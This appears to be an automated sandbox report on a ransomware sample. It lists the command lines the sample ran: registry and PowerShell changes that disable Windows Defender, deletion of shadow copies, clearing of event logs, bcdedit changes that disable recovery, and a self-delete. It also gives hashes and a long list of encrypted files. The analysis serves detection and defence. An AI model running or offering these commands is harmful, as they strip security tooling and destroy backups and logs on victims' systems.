| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
| C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\vssadmin.exe | vssadmin.exe delete shadows /all /quiet |
| C:\Windows\system32\wevtutil.exe | wevtutil.exe cl system |
| C:\Windows\system32\wevtutil.exe | wevtutil.exe cl security |
| C:\Windows\system32\wevtutil.exe | wevtutil.exe cl application |
| C:\Windows\System32\Wbem\wmic.exe | wmic.exe SHADOWCOPY /nointeractive |
| C:\Windows\System32\Wbem\wmic.exe | wmic.exe shadowcopy delete |
| C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures |
| C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} recoveryenabled no |
| C:\Windows\system32\cmd.exe | cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All |
| C:\Program Files\Windows Defender\MpCmdRun.exe | "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All |
| C:\Windows\system32\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableIOAVProtection $true |
| C:\Windows\system32\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| C:\Windows\system32\notepad.exe | notepad.exe C:\C3QW_HOW_TO_DECRYPT.txt |
| C:\Windows\system32\cmd.exe | cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe" |
| C:\Windows\system32\PING.EXE | ping.exe -n 5 127.0.0.1 |
Network
Files
memory/1520-53-0x000007FEFB711000-0x000007FEFB713000-memory.dmp
memory/2156-57-0x000007FEF2830000-0x000007FEF338D000-memory.dmp
memory/2156-58-0x000007FEF4F5E000-0x000007FEF4F5F000-memory.dmp
memory/2156-59-0x0000000002740000-0x0000000002742000-memory.dmp
memory/2156-60-0x0000000002742000-0x0000000002744000-memory.dmp
memory/2156-61-0x0000000002744000-0x0000000002747000-memory.dmp
memory/2156-62-0x000000000274B000-0x000000000276A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| Algorithm | Digest |
|---|---|
| MD5 | fc6f0fce37f30c1b1c5c052d76293933 |
| SHA1 | 081ab9812706f302785a646f6c32d91ca80f51f2 |
| SHA256 | dd2585ef3f97b7fff50f6bfec08c6e903c7fcaeb4432271f96ef19a510cf931d |
| SHA512 | ced814d8c8a8638f6f756a4229ed3156b9fe8bb476dd0f8202073337b4a35e7c55ff20756979822fe668515f00f654decc3264823ee49295cada1962e5c0ce9b |
memory/2248-65-0x000007FEF1E90000-0x000007FEF29ED000-memory.dmp
memory/2248-69-0x00000000024D4000-0x00000000024D7000-memory.dmp
memory/2248-68-0x00000000024D2000-0x00000000024D4000-memory.dmp
memory/2248-67-0x00000000024D0000-0x00000000024D2000-memory.dmp
memory/2248-70-0x00000000024DB000-0x00000000024FA000-memory.dmp
memory/2248-66-0x000007FEF45BE000-0x000007FEF45BF000-memory.dmp
C:\C3QW_HOW_TO_DECRYPT.txt
| Algorithm | Digest |
|---|---|
| MD5 | 1ae90b6777e6a8e5a50a140911c19659 |
| SHA1 | e690e81a7ce5f76377a656af06845478aadcbf29 |
| SHA256 | a2c864df5fa0462b3e732f525f84853d6c1ddde795fd2fa1f94826f527671519 |
| SHA512 | fb38906f464fbdd832b13bfcd4c10e84984d529cf5e09b05f2269e89b125d11a570eb0984db46a2beaeafea76ea071f07039092dbd6d9df6d595e91ea26e4da2 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-02-17 10:21
Reported
2022-02-17 10:23
Platform
win10v2004-en-20220112
Max time kernel
151s
Max time network
153s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\StartConvertFrom.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\HideJoin.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_GAAAABgAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RepairEnter.tif => C:\Users\Admin\Pictures\RepairEnter.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_GgAAABoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RepairEnter.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_GgAAABoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\StartConvertFrom.tif => C:\Users\Admin\Pictures\StartConvertFrom.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ClearStart.crw.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\JoinStart.crw => C:\Users\Admin\Pictures\JoinStart.crw.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_OgAAADoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\GroupWatch.png.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\HideJoin.tif => C:\Users\Admin\Pictures\HideJoin.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_GAAAABgAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\JoinStart.crw.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_OgAAADoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OpenCheckpoint.raw => C:\Users\Admin\Pictures\OpenCheckpoint.raw.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_KgAAACoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ResetRead.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_GgAAABoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ClearStart.crw => C:\Users\Admin\Pictures\ClearStart.crw.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\GroupWatch.png => C:\Users\Admin\Pictures\GroupWatch.png.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OpenCheckpoint.raw.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_KgAAACoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ResetRead.tif => C:\Users\Admin\Pictures\ResetRead.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_GgAAABoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Images\Welcome_Slide01.jpg | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WorldClockMedTile.contrast-white_scale-100.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptyView.scale-125.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription5-ul-oob.xrm-ms.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\32.jpg | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-30_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\StoreLogo.scale-150_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_OAAAADgAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\Attribution\accuweather.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-20.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\main.css.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_IgAAACIAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\deploy\[email protected]_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxLargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\GostName.XSL.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_KAAAACgAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Format.ps1xml.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_EgAAABIAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\LayersControl\Road.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_RHP.aapp.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_OgAAADoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\ui-strings.js.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_OgAAADoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\sqlpdw.xsl.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_EAAAABAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageWideTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-black_targetsize-80.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-black\LargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\LargeTile.scale-100_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-16.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_CA\excluded.txt.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_FgAAABYAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Grace-ppd.xrm-ms.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_GAAAABgAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\NETWORK\PREVIEW.GIF.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_altform-unplated_contrast-white_devicefamily-colorfulunplated.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTest-pl.xrm-ms.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_CgAAAAoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART10.BDR.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\MediaInkCanvas.xbf | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-20_altform-colorize.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\MedTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\CortanaApp.ViewElements\Assets\Settings-Black.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Fur.dxt | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\FileForms32x32.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.scale-100.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\VideoEditor.Common\Resources\SimpleProgressBarTheme.xbf | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-63.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\EmptySearch.scale-150.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-40.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.scale-200.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-white_targetsize-16.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons.png.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\ui-strings.js.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_EAAAABAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ul-oob.xrm-ms.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_FAAAABQAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
